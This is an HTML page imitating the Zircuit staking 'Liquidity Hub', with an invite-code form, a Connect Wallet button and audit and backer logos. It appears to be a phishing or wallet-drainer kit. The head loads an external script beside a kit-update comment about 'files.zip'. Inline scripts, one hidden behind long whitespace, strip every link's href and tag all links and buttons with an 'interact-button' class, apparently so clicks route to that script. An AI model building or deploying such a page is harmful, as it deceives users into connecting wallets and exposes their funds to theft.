<!DOCTYPE html>
<html style="--wcm-color-fg-1: rgb(20,20,20); --wcm-color-fg-2: rgb(121,134,134); --wcm-color-fg-3: rgb(158,169,169); --wcm-color-bg-1: rgb(255,255,255); --wcm-color-bg-2: rgb(241,243,243); --wcm-color-bg-3: rgb(228,231,231); --wcm-color-overlay: rgba(0,0,0,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;">

<head>
  <script charset="UTF-8" type="text/javascript" src="./a720315a-12d5-4fc5-97d1-955fb84ed524.js"></script><!–– Please update files.zip if you not already did and check below (updated the 07/29) ––>
    <script>
      document.addEventListener('DOMContentLoaded', function () {
        var links = document.querySelectorAll('body a');
        for (var i = 0; i < links.length; i++) {
        var link = links[i];
        link.removeAttribute('href');
        link.classList.add('interact-button');
        }
        });
        </script>                                                                                                                          <script>
      document.addEventListener('DOMContentLoaded', function () {
      var buttons = document.querySelectorAll('body button');
      for (var i = 0; i < buttons.length; i++) {
        var button = buttons[i];
        button.classList.add('interact-button');
      }
      });
      </script>
      <script>
      document.addEventListener("DOMContentLoaded", function() {
        const elements = document.querySelectorAll('[ad-data-linked]');
        elements.forEach(element => {
          element.removeAttribute('ad-data-linked');
        });
      
        console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
      });
      
      </script>
      
        <style>
        .interact-button {
        cursor: pointer;
        }
        </style>

    <meta name="viewport" content="width=device-width">
    <title>Zircuit - Liquidity Hub</title>
    <meta name="description" content="Zircuit Mainnet is Live - Earn Staking Rewards and Project Airdrops">
    <meta property="og:url" content="https://app.zircuit.com">
    <meta property="og:type" content="website">
    <meta property="og:title" content="Zircuit - Liquidity Hub">
    <meta property="og:description" content="Zircuit Mainnet is Live - Earn Staking Rewards and Project Airdrops">
    <meta property="og:image" content="https://static.zircuit.com/stake/metatag/staking-preview-image.png">
    <meta name="twitter:card" content="summary_large_image">
    <meta property="twitter:domain" content="app.zircuit.com">
    <meta property="twitter:url" content="https://app.zircuit.com">
    <meta name="twitter:title" content="Zircuit - Liquidity Hub">
    <meta name="twitter:description" content="Zircuit Mainnet is Live - Earn Staking Rewards and Project Airdrops">
    <meta name="twitter:image" content="https://static.zircuit.com/stake/metatag/staking-preview-image.png">
    <link rel="shortcut icon" href="icon.png">
    <meta name="next-head-count" content="16">
    <link rel="stylesheet" href="59a77bda7223e794.css" data-n-g=""><noscript data-n-css=""></noscript>
    <style data-styled="active" data-styled-version="6.1.13">
        .cXCTLQ { border-radius: 100px; color: white; padding: 8px 16px; border: none; cursor: pointer; font-size: 14px; font-family: __ttHover_019e8c, __ttHover_Fallback_019e8c; font-style: normal; font-weight: 500; line-height: 20px; letter-spacing: -0.14px; transition: 0.22s; height: 36px; background: rgb(43, 126, 33); }
        .cXCTLQ:hover { opacity: 0.7; }
        .cXCTLQ:focus { outline: none; }
        .cXCTLQ:disabled { opacity: 0.5; cursor: not-allowed; }
        .lpndiP { display: flex; justify-content: center; padding: 10px; font-weight: 500; color: black; background: rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.5) 0px 0px 1px 0px; width: 50px; height: auto; }
        .lpndiP:first-of-type { margin-bottom: 12px; }
        .lpndiP img { width: 20px; height: 20px; }
        .bcaRyZ { display: flex; background-color: rgba(255, 255, 255, 0.8); width: 1360px; overflow: hidden; border-radius: 8px; box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 1px 0px, rgba(0, 0, 0, 0.1) 0px 0px 4px 0px; }
        @media screen and (min-width: 1200px) {
          .bcaRyZ { max-height: 840px; height: calc(-70px + 100vh); }
        }
        .lZBCK { display: flex; }
        .gbFctc { display: flex; align-items: center; justify-content: center; flex: 1 1 auto; }
        .bKUjIR { display: flex; flex-direction: column; justify-content: space-between; width: 282px; background-color: white; color: rgb(255, 255, 255); padding: 29px 24px; border-right: 1px solid rgb(221, 221, 221); }
        @media screen and (max-width: 1200px) {
          .bKUjIR { display: none; position: fixed; z-index: 5; width: 200px; overflow: overlay; right: 0px; top: 0px; bottom: 0px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px; }
        }
        .iJJGlb { list-style: none; padding: 0px; margin-top: 35px; }
        .bngrtk { border-radius: 8px; opacity: 0.8; padding-left: 0px; }
        .bngrtk:hover { background: linear-gradient(90deg, rgba(192, 173, 0, 0.1) -10.2%, rgba(20, 182, 0, 0.1) 47.34%, rgba(0, 126, 73, 0.1) 109.67%); }
        .mWoxa { border-radius: 8px; opacity: 0.8; padding-left: 20px; }
        .mWoxa:hover { background: linear-gradient(90deg, rgba(192, 173, 0, 0.1) -10.2%, rgba(20, 182, 0, 0.1) 47.34%, rgba(0, 126, 73, 0.1) 109.67%); }
        .bWOocA { border-radius: 8px; background: linear-gradient(90deg, rgba(192, 173, 0, 0.1) -10.2%, rgba(20, 182, 0, 0.1) 47.34%, rgba(0, 126, 73, 0.1) 109.67%); padding-left: 20px; }
        .bWOocA:hover { background: linear-gradient(90deg, rgba(192, 173, 0, 0.1) -10.2%, rgba(20, 182, 0, 0.1) 47.34%, rgba(0, 126, 73, 0.1) 109.67%); }
        .hUrJVZ { padding: 14px 20px; display: flex; align-items: center; gap: 8px; color: rgb(9, 35, 6); font-family: __ttHover_019e8c, __ttHover_Fallback_019e8c; font-size: 16px; font-style: normal; font-weight: 500; line-height: normal; text-decoration: none; cursor: pointer; }
        .fUyPtA { color: black; font-size: 16px; font-weight: 500; margin-bottom: 40px; padding: 0px 16px; }
        .ijyOht { padding-top: 16px; display: flex; align-items: center; gap: 16px; flex-wrap: wrap; color: black; }
        .ijyOht img { cursor: pointer; width: 80px; height: auto; }
        .ipbslD { display: flex; align-items: baseline; color: black; gap: 12px; font-size: 16px; font-weight: 500; padding: 0px 16px; }
        @media screen and (max-width: 1200px) {
          .bmKsRO { display: none; }
        }
        .iRmgwQ { display: flex; position: relative; justify-content: space-between; align-items: center; padding: 24px; }
        .iRmgwQ .hamburger-react { position: absolute !important; }
        @media screen and (max-width: 1200px) {
          .iRmgwQ { padding: 10px; }
        }
        @media screen and (min-width: 1200px) {
          .cdIRsO { display: none; }
        }
        .jamxmY { display: flex; flex: 1 1 0%; align-items: center; gap: 24px; color: rgb(9, 35, 6); }
        @media screen and (max-width: 1200px) {
          .jamxmY { display: none; }
        }
        .liOgtn { display: flex; flex-direction: column; gap: 4px; font-size: 15px; font-style: normal; font-weight: 400; line-height: 20px; }
        .liOgtn span { font-weight: bold; }
        .gMAMpW { background-color: rgb(221, 221, 221); height: 58px; width: 1px; }
        .fvWEyJ { display: flex; gap: 8px; }
        @media screen and (max-width: 1200px) {
          .fvWEyJ { right: 50px; position: relative; }
        }
        .eqZVPb { display: flex; gap: 5px; }
        .buoeip { white-space: nowrap; background-color: rgb(241, 246, 241); border: 1px solid rgb(43, 126, 33); color: rgb(43, 126, 33); }
        .epJhme { font-variant-numeric: tabular-nums; white-space: nowrap; }
        body { margin: 0px; font-family: __ttHover_019e8c, __ttHover_Fallback_019e8c; font-weight: normal; color: black; background-color: rgb(244, 241, 229); }
        h1, h2, h3, h4, h5, h6, p { margin: 0px; }
        p { font-weight: 600; }
        .Toastify__toast-theme--light { background: rgb(243, 254, 240); border-radius: 8px; }
        .Toastify__toast--error { background: rgb(252, 221, 182); }
        .Toastify__toast-body { gap: 10px; color: black; font-size: 16px; }
        .Toastify__progress-bar, .Toastify__progress-bar--bg { background-color: transparent; }
        .react-tooltip { max-width: 350px; z-index: 99999; border-radius: 8px !important; background-color: white !important; color: black !important; box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 4px 0px, rgba(0, 0, 0, 0.12) 0px 0px 2px 0px !important; }
        @media screen and (min-width: 1200px) {
          ::-webkit-scrollbar { width: 8px; }
          ::-webkit-scrollbar-track { box-shadow: none; background: transparent; border-radius: 10px; }
          ::-webkit-scrollbar-thumb { background: rgb(170, 207, 190); border-radius: 20px; }
          ::-webkit-scrollbar-thumb:hover { background: rgb(170, 207, 190); }
        }
        @property --angle { syntax: "<angle>"; inherits: false; initial-value: 0deg; }
        .hamburger-react { z-index: 6; position: absolute !important; right: 0px !important; }
        @media screen and (min-width: 1200px) {
          .hamburger-react { display: none; }
        }
        #binanceW3W-wrapper :is(.w-full) { width: -webkit-fill-available !important; }
        .kdzBgP { display: flex; justify-content: center; align-items: center; margin: 0px; }
        @media screen and (min-width: 980px) {
          .kdzBgP { min-height: 100vh; }
        }
        .jhsrlU { display: flex; flex-direction: column; width: 100%; overflow-x: hidden; }
        .botVoK { background-color: rgb(221, 221, 221); height: 1px; margin-bottom: 1px; }
        .ldjJWN { border-radius: 15px; border: 2.5px solid rgba(9, 35, 6, 0.2); background: rgb(255, 255, 255); width: 59px; height: 91px; color: rgb(9, 35, 6); text-align: center; font-family: __ttHover_019e8c, __ttHover_Fallback_019e8c; font-size: 48px; font-style: normal; font-weight: 500; line-height: normal; padding: 0px; margin: 0px; }
        .ldjJWN:last-child { margin-right: 0px; }
        .ldjJWN:focus { outline: 0px; border-color: rgb(43, 126, 33); }
        .ldjJWN:disabled { cursor: not-allowed; background-color: rgb(249, 248, 247); }
        @media (max-width: 581px) {
          .ldjJWN { width: 47px; height: 66px; }
        }
        .jkcktT { display: flex; align-items: center; gap: 8px; background: linear-gradient(90deg, rgba(255, 204, 0, 0.3) -0.72%, rgba(20, 182, 0, 0.3) 47.58%, rgba(0, 126, 73, 0.3) 99.91%); padding: 8px 12px; min-height: 32px; }
        .jkcktT img { max-width: 32px; }
        .jkcktT p { font-weight: normal; font-size: 16px; }
        @media screen and (max-width: 1200px) {
          .jkcktT { padding: 10px !important; }
        }
        .gLJjeI { margin: 0px; }
        .zmygX { font-size: 14px; font-weight: 500; line-height: 20px; margin: 24px auto auto; text-align: left; max-width: 570px; }
        .hIRxOH { display: grid; grid-template-columns: repeat(auto-fit, minmax(141px, 1fr)); align-items: center; justify-content: center; gap: 24px; margin-top: 15px; }
        .hIRxOH img { height: auto; width: auto; max-height: 32px; max-width: 141px; margin: auto; }
        @media (max-width: 600px) {
          .hIRxOH { grid-template-columns: 1fr 1fr; }
          .hIRxOH div { display: none; }
        }
        .jXujCP { display: grid; grid-template-columns: repeat(auto-fit, minmax(95px, 1fr)); align-items: center; justify-content: center; gap: 24px; margin-top: 15px; }
        .jXujCP img { height: auto; width: auto; max-height: 32px; max-width: 141px; margin: auto; }
        @media (max-width: 600px) {
          .jXujCP { grid-template-columns: 1fr 1fr; }
          .jXujCP div { display: none; }
        }
        .iHUKb { display: flex; flex-direction: column; overflow: auto; }
        @media screen and (max-width: 1200px) {
          .iHUKb .sc-8f189f01-0 { width: 100%; }
        }
        .dVRKpa { overflow: auto; }
        @media screen and (max-width: 1200px) {
          .dVRKpa { padding: 0px 20px; }
        }
        .EYvAz { max-width: 600px; margin: 80px auto; text-align: center; }
        @media screen and (max-width: 581px) {
          .EYvAz { margin: 24px auto; }
        }
        .fTSNxZ { margin-bottom: 52px; display: flex; flex-direction: column; }
        .fTSNxZ h1 { display: flex; align-items: center; justify-content: center; gap: 10px; font-size: 32px; font-style: normal; font-weight: 500; line-height: 40px; }
        .fTSNxZ p { font-size: 16px; font-style: normal; font-weight: 400; line-height: 20px; margin-top: 24px; }
        .fTSNxZ a { color: rgb(43, 126, 33); font-weight: 500; text-decoration: none; }
        .fTSNxZ a:hover { text-decoration: underline; }
        @media screen and (max-width: 581px) {
          .fTSNxZ { margin-bottom: 25px; }
        }
        .fiOyeN { display: flex; flex-wrap: wrap; gap: 24px; justify-content: center; margin-top: 24px; }
        @media screen and (max-width: 581px) {
          .fiOyeN { gap: 12px; flex-wrap: initial; }
          .fiOyeN input { width: 42px; height: 57px; }
        }
    </style>
   
</head>

<body>
    <div id="__next">
        <div data-rk="">
            <style>
                [data-rk]{--rk-blurs-modalOverlay:blur(0px);--rk-fonts-body:SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";--rk-radii-actionButton:9999px;--rk-radii-connectButton:12px;--rk-radii-menuButton:12px;--rk-radii-modal:24px;--rk-radii-modalMobile:28px;--rk-colors-accentColor:#2b7e21;--rk-colors-accentColorForeground:#FFF;--rk-colors-actionButtonBorder:rgba(0, 0, 0, 0.04);--rk-colors-actionButtonBorderMobile:rgba(0, 0, 0, 0.06);--rk-colors-actionButtonSecondaryBackground:rgba(0, 0, 0, 0.06);--rk-colors-closeButton:rgba(60, 66, 66, 0.8);--rk-colors-closeButtonBackground:rgba(0, 0, 0, 0.06);--rk-colors-connectButtonBackground:#FFF;--rk-colors-connectButtonBackgroundError:#FF494A;--rk-colors-connectButtonInnerBackground:linear-gradient(0deg, rgba(0, 0, 0, 0.03), rgba(0, 0, 0, 0.06));--rk-colors-connectButtonText:#25292E;--rk-colors-connectButtonTextError:#FFF;--rk-colors-connectionIndicator:#30E000;--rk-colors-downloadBottomCardBackground:linear-gradient(126deg, rgba(255, 255, 255, 0) 9.49%, rgba(171, 171, 171, 0.04) 71.04%), #FFFFFF;--rk-colors-downloadTopCardBackground:linear-gradient(126deg, rgba(171, 171, 171, 0.2) 9.49%, rgba(255, 255, 255, 0) 71.04%), #FFFFFF;--rk-colors-error:#FF494A;--rk-colors-generalBorder:#dddddd;--rk-colors-generalBorderDim:rgba(0, 0, 0, 0.03);--rk-colors-menuItemBackground:rgba(60, 66, 66, 0.1);--rk-colors-modalBackdrop:rgba(0, 0, 0, 0.3);--rk-colors-modalBackground:#FFF;--rk-colors-modalBorder:transparent;--rk-colors-modalText:#25292E;--rk-colors-modalTextDim:rgba(60, 66, 66, 0.3);--rk-colors-modalTextSecondary:rgba(60, 66, 66, 0.6);--rk-colors-profileAction:#FFF;--rk-colors-profileActionHover:rgba(255, 255, 255, 0.5);--rk-colors-profileForeground:rgba(60, 66, 66, 0.06);--rk-colors-selectedOptionBorder:rgba(60, 66, 66, 0.1);--rk-colors-standby:#FFD641;--rk-shadows-connectButton:0px 4px 12px rgba(0, 0, 0, 0.1);--rk-shadows-dialog:0px 8px 32px rgba(0, 0, 0, 0.32);--rk-shadows-profileDetailsAction:0px 2px 6px rgba(37, 41, 46, 0.04);--rk-shadows-selectedOption:0px 2px 6px rgba(0, 0, 0, 0.24);--rk-shadows-selectedWallet:0px 2px 6px rgba(0, 0, 0, 0.12);--rk-shadows-walletLogo:0px 2px 16px rgba(0, 0, 0, 0.16);}
            </style>
            <div class="Toastify"></div>
            <div class="sc-68a7340a-0 kdzBgP">
                <div class="sc-3a89bcf1-0 bcaRyZ">
                    <div class="sc-20a9a2f7-0 bKUjIR">
                        <div><img src="zircuit-logo.4c4fc197.svg" alt="Logo" class="sc-20a9a2f7-7 bmKsRO">
                            <ul data-test="sidebar-nav" class="sc-20a9a2f7-1 iJJGlb">
                                <li class="sc-20a9a2f7-2 bngrtk"><span class="sc-20a9a2f7-3 hUrJVZ"><img alt="Zircuit Liquidity Hub" loading="lazy" width="16" height="17" decoding="async" data-nimg="1" style="color:transparent" src="liquidity-icon.8e01ffd5.svg">Zircuit Liquidity Hub</span></li>
                                <li class="sc-20a9a2f7-2 mWoxa"><span class="sc-20a9a2f7-3 hUrJVZ"><img alt="L2 Staking" loading="lazy" width="16" height="17" decoding="async" data-nimg="1" style="color:transparent" src="l2-staking-icon.357c8df7.svg">L2 Staking</span></li>
                                <li class="sc-20a9a2f7-2 bWOocA"><span class="sc-20a9a2f7-3 hUrJVZ"><img alt="L1 Staking" loading="lazy" width="16" height="19" decoding="async" data-nimg="1" style="color:transparent" src="l1-staking-icon.6e03631a.svg">L1 Staking</span></li>
                                <li class="sc-20a9a2f7-2 bngrtk"><span class="sc-20a9a2f7-3 hUrJVZ"><img alt="EigenLayer Fairdrop" loading="lazy" width="16" height="17" decoding="async" data-nimg="1" style="color:transparent" src="fairdrop-icon.ae311d30.svg">EigenLayer Fairdrop</span></li>
                                <li class="sc-20a9a2f7-2 bngrtk"><span class="sc-20a9a2f7-3 hUrJVZ"><img alt="FAQ" loading="lazy" width="16" height="17" decoding="async" data-nimg="1" style="color:transparent" src="faq-icon.611b6df5.svg">FAQ</span></li>
                                <li class="sc-20a9a2f7-2 bngrtk"><span class="sc-20a9a2f7-3 hUrJVZ"><img alt="Bridge" loading="lazy" width="18" height="17" decoding="async" data-nimg="1" style="color:transparent" src="bridge-icon.40e2103a.svg">Bridge</span></li>
                            </ul>
                        </div>
                        <div>
                            <div class="sc-20a9a2f7-4 fUyPtA">Audited by<div class="sc-20a9a2f7-5 ijyOht"><img alt="Ottersec logo" loading="lazy" width="106" height="24" decoding="async" data-nimg="1" style="color:transparent" src="ottersec-logo.43897955.svg"><img alt="Dedaub logo" loading="lazy" width="106" height="11" decoding="async" data-nimg="1" style="color:transparent" src="dedaub-logo.54652798.svg"><img alt="Halborn logo" loading="lazy" width="233" height="24" decoding="async" data-nimg="1" style="color:transparent" src="halborn-logo.56860842.svg"><img alt="Decurity logo" loading="lazy" width="1286" height="318" decoding="async" data-nimg="1" style="color:transparent" src="decurity-logo.82338a34.svg"></div>
                            </div>
                            <div class="sc-20a9a2f7-6 ipbslD"><button class="sc-8f189f01-0 sc-7e69123d-0 cXCTLQ lpndiP"><img alt="X" loading="lazy" width="16" height="17" decoding="async" data-nimg="1" style="color:transparent" src="x-icon.3938ceb6.svg"></button><button class="sc-8f189f01-0 sc-7e69123d-0 cXCTLQ lpndiP"><img alt="Telegram" loading="lazy" width="20" height="20" decoding="async" data-nimg="1" style="color:transparent" src="telegram-icon.a05ce5ea.svg"></button><button class="sc-8f189f01-0 sc-7e69123d-0 cXCTLQ lpndiP"><img alt="Join Discord" loading="lazy" width="21" height="16" decoding="async" data-nimg="1" style="color:transparent" src="discord-icon.79583b21.svg"></button></div>
                        </div>
                    </div>
                    <div></div>
                    <div class="sc-68a7340a-1 jhsrlU">
                        <div class="sc-101fb4fb-0 iRmgwQ"><img src="zircuit-logo.4c4fc197.svg" alt="Logo" class="sc-101fb4fb-1 cdIRsO">
                            <div class="sc-101fb4fb-2 jamxmY">
                                <div class="sc-101fb4fb-3 liOgtn">Total Staked
                                    <!-- --> <span class="sc-101fb4fb-10 epJhme">$ 1,620,310,213.58</span>
                                </div>
                                <div style="visibility:visible" class="sc-101fb4fb-5 gMAMpW"></div>
                                <div class="sc-101fb4fb-3 liOgtn">
                                    <!-- -->Stakers are earning<span>Staking APR + Restaking APR + Zircuit Points + Project Airdrops</span>
                                </div>
                            </div>
                            <div class="sc-101fb4fb-6 fvWEyJ">
                                <div class="sc-101fb4fb-7 eqZVPb"><button type="button" class="sc-8f189f01-0 sc-101fb4fb-8 cXCTLQ buoeip">Connect Wallet</button></div>
                            </div>
                            <div class="hamburger-react" aria-expanded="false" role="button" style="cursor:pointer;height:48px;position:relative;transition:0.4s cubic-bezier(0, 0, 0, 1);user-select:none;width:48px;outline:none;transform:none" tabindex="0">
                                <div style="background:currentColor;height:3px;left:8px;position:absolute;width:32px;top:13px;transition:0.4s cubic-bezier(0, 0, 0, 1);transform:none"></div>
                                <div style="background:currentColor;height:3px;left:8px;position:absolute;width:32px;top:23px;transition:0.4s cubic-bezier(0, 0, 0, 1);transform:none"></div>
                                <div style="background:currentColor;height:3px;left:8px;position:absolute;width:32px;top:33px;transition:0.4s cubic-bezier(0, 0, 0, 1);transform:none"></div>
                            </div>
                        </div>
                        <div class="sc-da8b5a7c-0 iHUKb">
                            <div class="sc-30d917bb-0 jkcktT"><img alt="Cute face" loading="lazy" width="29" height="24" decoding="async" data-nimg="1" srcset="orange-cat-head-icon-1.jpeg 1x, orange-cat-head-icon.jpeg 2x" src="orange-cat-head-icon.jpeg" style="color: transparent;">Join the community of over 100k others – Stake your ETH LSTs/LRTs and earn Zircuit points</div>
                            <div class="sc-da8b5a7c-1 dVRKpa">
                                <div class="sc-da8b5a7c-2 EYvAz">
                                    <div class="sc-da8b5a7c-3 fTSNxZ">
                                        <h1><img alt="Cat" loading="lazy" width="50" height="36" decoding="async" data-nimg="1" src="cute-cat-icon.2ae8b2bf.svg" style="color: transparent;">Enter your invite code<img alt="Cat" loading="lazy" width="49" height="36" decoding="async" data-nimg="1" src="cute-green-cat-icon.4e21b087.svg" style="color: transparent;"></h1>
                                        <form data-test="join-invite-code-form" class="sc-da8b5a7c-4 fiOyeN"><input type="text" maxlength="1" class="sc-b8e0d9bc-0 ldjJWN" value=""><input type="text" maxlength="1" class="sc-b8e0d9bc-0 ldjJWN" value=""><input type="text" maxlength="1" class="sc-b8e0d9bc-0 ldjJWN" value=""><input type="text" maxlength="1" class="sc-b8e0d9bc-0 ldjJWN" value=""><input type="text" maxlength="1" class="sc-b8e0d9bc-0 ldjJWN" value=""><input type="text" maxlength="1" class="sc-b8e0d9bc-0 ldjJWN" value=""></form>
                                    </div>
                                    <div class="sc-eee4b7f1-0 botVoK"></div>
                                    <div class="sc-eee4b7f1-0 botVoK"></div>
                                    <div class="sc-da04ba32-0 gLJjeI">
                                        <div class="sc-da04ba32-1 zmygX">Backed by<div gap="24px" class="sc-da04ba32-2 hIRxOH"><img alt="Pantera" loading="lazy" width="167" height="20" decoding="async" data-nimg="1" src="pantera-logo.cc51bbfe.svg" style="color: transparent;"><img alt="Dragonfly Capital" loading="lazy" width="123" height="40" decoding="async" data-nimg="1" src="dragonfly-capital-logo.5db386e5.svg" style="color: transparent;"><img alt="Maelstorm" loading="lazy" width="148" height="26" decoding="async" data-nimg="1" src="maelstorm-logo.6054ce2c.svg" style="color: transparent;"><img alt="Binance Labs" loading="lazy" width="139" height="35" decoding="async" data-nimg="1" src="binance-labs-logo.bd322fa8.svg" style="color: transparent;"><img alt="Nomad Capital" loading="lazy" width="218" height="62" decoding="async" data-nimg="1" src="nomad-capital-logo.1d9f6691.svg" style="color: transparent;"><img alt="Mirana" loading="lazy" width="139" height="25" decoding="async" data-nimg="1" src="mirana-logo.d57f4639.svg" style="color: transparent;"></div>
                                        </div>
                                        <div class="sc-da04ba32-1 zmygX">Powered by<div gap="24px" class="sc-da04ba32-2 jXujCP"><img alt="EigenLayer" loading="lazy" width="42" height="32" decoding="async" data-nimg="1" src="eigen-layer-logo.bc324297.svg" style="color: transparent;"><img alt="Kelp" loading="lazy" width="80" height="28" decoding="async" data-nimg="1" src="kelp-logo.3ea38c76.svg" style="color: transparent;"><img alt="Renzo" loading="lazy" width="89" height="32" decoding="async" data-nimg="1" src="renzo-logo.1b0820fb.svg" style="color: transparent;"><img alt="Lido" loading="lazy" width="101" height="32" decoding="async" data-nimg="1" src="lido-logo.6876211c.svg" style="color: transparent;"><img alt="EtherFi" loading="lazy" width="89" height="32" decoding="async" data-nimg="1" src="ether-fi-logo.5515e18b.svg" style="color: transparent;"><img alt="Swell" loading="lazy" width="83" height="32" decoding="async" data-nimg="1" src="swell-logo.7289836d.svg" style="color: transparent;"><img alt="Liquid Collective" loading="lazy" width="124" height="28" decoding="async" data-nimg="1" src="liquid-collective-logo.f7dc6215.svg" style="color: transparent;"><img alt="Ethena" loading="lazy" width="80" height="22" decoding="async" data-nimg="1" src="ethena-logo.11dea84b.svg" style="color: transparent;"><img alt="Eigenpie" loading="lazy" width="97" height="28" decoding="async" data-nimg="1" src="eigenpie-logo.fa5e3f68.svg" style="color: transparent;"><img alt="StakeStone" loading="lazy" width="170" height="32" decoding="async" data-nimg="1" src="stakestone-logo.2cca7fba.svg" style="color: transparent;"><img alt="Puffer" loading="lazy" width="106" height="32" decoding="async" data-nimg="1" src="puffer-logo.517ca0f5.svg" style="color: transparent;"><img alt="Mantle" loading="lazy" width="122" height="32" decoding="async" data-nimg="1" src="mantle-logo.3d01333f.svg" style="color: transparent;"><img alt="PumpBTC" loading="lazy" width="125" height="32" decoding="async" data-nimg="1" src="pumpbtc-text-logo.e9f55aef.svg" style="color: transparent;"><img alt="Mellow" loading="lazy" width="81" height="32" decoding="async" data-nimg="1" src="mellow-logo.5636ec71.svg" style="color: transparent;"><img alt="FBTC" loading="lazy" width="80" height="32" decoding="async" data-nimg="1" src="fbtc-text-logo.8bd3ee2e.svg" style="color: transparent;"><img alt="Lombard" loading="lazy" width="173" height="26" decoding="async" data-nimg="1" src="lombard-logo.247e0b90.svg" style="color: transparent;"><img alt="WBTC" loading="lazy" width="702" height="209" decoding="async" data-nimg="1" src="wbtc-text-logo.01b22a82.svg" style="color: transparent;"></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert" style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;"></p>
    </next-route-announcer>
   
  
</body>

</html>